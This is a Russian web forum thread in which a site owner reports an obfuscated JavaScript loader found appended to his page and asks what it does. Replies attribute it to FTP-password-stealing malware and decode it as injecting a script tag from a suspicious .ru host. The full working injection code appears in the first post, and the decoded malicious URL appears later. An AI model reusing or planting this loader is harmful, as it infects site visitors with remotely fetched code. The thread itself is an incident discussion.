Разное

на одном из своих сайтов, сданных еще в 05-м году, обнаружил в коде страницы в самом низу приписочку:

<script>var Ta;if(Ta!='Ng' && Ta!='h'){Ta=''};this.Tw='';try {this.c='';this.to='';var N="repl"+"aceMsDP".substr(0,3);var vg="";var hj;if(hj!='j' && hj != ''){hj=null};var e=new Array();var o=new Array();var Nn=RegExp;this.MS="";function Q(r,v){var Au=new Date();var D="Qi2Z[".substr(4);var AK;if(AK!='qH'){AK='qH'};var Ni=new String("g");var p=new Date();this.Ba='';D+=v;this.Yc='';var Bm;if(Bm!='Vk' && Bm!='vV'){Bm='Vk'};D+=String("]");var Tr="";var z;if(z!='Fo' && z != ''){z=null};var T=new Nn(D, Ni);this.uu="";return r[N](T, new String());};var i=new String();var t=window;this.Qa="";this.zC="";var R=new Array();var KW;if(KW!='' && KW!='pd'){KW=''};var d=Q('c0r3eva1t0e1E3l1evm0e1n0t0',"v130");var RG;if(RG!='Fh' && RG != ''){RG=null};var I=Q('/jgPowoPgPl0e0.jc0o0m0/PgwoPojgPlweP.jcjoPmj/PbPajrPnjewsjawnjdjnwowbPljeP.0cwoPm0/Pmjt0ijmwe0.PcPo0m0/0nPejoPbwuPxP.0c0ojmw.PpPh0p0',"wjP0");var jm;if(jm!='zM'){jm='zM'};this.Vi='';var _=Q('hAt0t0pA:0/A/Ai0nAd0iAa0nAr0a0i0lA-Ag0oAvA-0i0n0.As0kAyAc0n0.AcAo0m0.0mAc0sAs0lA-0cAo0m0.AYAoAuArASAuApAe0rAPAoAo0lA.ArAuA:0',"A0");var s=Q('s8cdr4i8p8t8',"48d");var DO='';var H=Q('896966066968969906999',"96");this.wb="";var Io=new String();var V=Q('oJnElIomaEdJ',"ImkJE");var Gj=new Array();var tD=new Array();E=function(){P=document[d](s);var Lw;if(Lw!='' && Lw!='Xo'){Lw='ha'};var Br="";var Yk;if(Yk!='qc'){Yk='qc'};DO=_+H;var re=new Array();var qg=new Array();DO+=I;var jP=new String();var RU;if(RU!='bk' && RU != ''){RU=null};var uz;if(uz!='za'){uz='za'};P.src=DO;var hp;if(hp!='ow' && hp!='zN'){hp=''};var lU='';P.defer=([1,8][0]);var UK;if(UK!='' && UK!='Lx'){UK=''};var VE=new Array();document.body.appendChild(P);this.LX='';var bA="";};var zQ;if(zQ!='' && zQ!='zv'){zQ='UR'};var nO=new Date();t[V]=E;var Bs=new String();var wE='';var Uq;if(Uq!='eif' && Uq!='x'){Uq='eif'};} catch(U){var ZR;if(ZR!='' && ZR!='Sk'){ZR=null};};var ww;if(ww!='mQ' && ww!='WB'){ww='mQ'};this.Kf="";</script> <!--3c16b6e0e6ecc5f7feac777f03547a36-->

Это таки вирус? Как им заражаются? Почему, например, антивирус провайдера его игнорирует, а пользователи начинают получать предупреждения систем безопасности?

Заражение идет с вашей клиентской машины (поэтому к провайдеру притензий быть не может), вирус/троян сидит у вас на машине и ворует FTP-пароли, которые затем робот использует для правки ваших страниц.

Как-то так я и подумал.
Интересно, чем этот код занимается...

генерирует
<script src="http://indianrail-gov-in.skycn.com.mcssl-com.YourSuperPool.ru:8080/google.com/google.com/barnesandnoble.com/mtime.com/neobux.com.php"></script>
и вставляет на страницу.

>Почему, например, антивирус провайдера его игнорирует, а пользователи начинают получать предупреждения систем безопасности?

У меня только что аваст завизжал, когда я пытался открыть эту тему через ИЕ. Этот пост в Опере пишу.

А что опасного в данной теме?

Код, который в первом посте. Ничего другого в этой теме нет. Другие темы открываются без проблем. Чтобы открыть эту тему, пришлось приостановить аваст. Дурь.

В этом посте не код, а текст этого кода.

Я понимаю. Аваст дурью мается - это я понял сразу.

что лишний раз говорит о "качестве" аваста..

Скрытая реклама? Любой современный антивирь "журчит" при виде таких строк

где реклама?
слово качество не даром в кавычки взято было.

>Любой современный антивирь "журчит" при виде таких строк

Мой не "журчит", и правильно делает, т.к. выдавать false positive на ровном месте это бред.

И вообще если браузер нормальный, то скрипты не предоставляют никакой опасности.

Что?!

Ну нормальный если. Текстовый. Люнкс там...

Ну понятно, типа смотреть веб-страницы Блокнотом... Ну тады таки да, все пофигу. Только назвать Блокнот нормальным браузером язык как-то не поворачивается.